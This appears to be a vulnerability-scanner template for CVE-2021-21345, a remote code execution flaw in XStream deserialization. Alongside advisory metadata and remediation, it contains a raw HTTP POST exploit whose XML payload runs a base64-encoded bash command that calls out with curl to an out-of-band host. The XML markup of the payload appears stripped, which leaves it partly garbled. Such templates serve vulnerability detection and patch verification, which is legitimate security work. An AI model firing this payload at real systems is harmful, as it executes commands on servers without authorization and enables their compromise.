id: CVE-2021-21345 info: name: XStream <1.4.16 - Remote Code Execution author: pwnhxl severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. reference: - https://x-stream.github.io/CVE-2021-21345.html - http://x-stream.github.io/changes.html#1.4.16 - https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4 - https://nvd.nist.gov/vuln/detail/CVE-2021-21345 remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2021-21345 cwe-id: CWE-78 epss-score: 0.46618 tags: cve,cve2021,xstream,deserialization,rce,oast variables: rand: "{{rand_base(6)}}" http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml 2 com.sun.corba.se.impl.activation.ServerTableEntry com.sun.corba.se.impl.activation.ServerTableEntry verify true 1 UTF-8 /bin/bash -c {echo,{{base64("curl http://{{interactsh-url}} -H \'User-Agent: {{rand}}\'")}}}|{base64,-d}|{bash,-i} 3 javax.xml.ws.binding.attachments.inbound javax.xml.ws.binding.attachments.inbound matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: {{rand}}"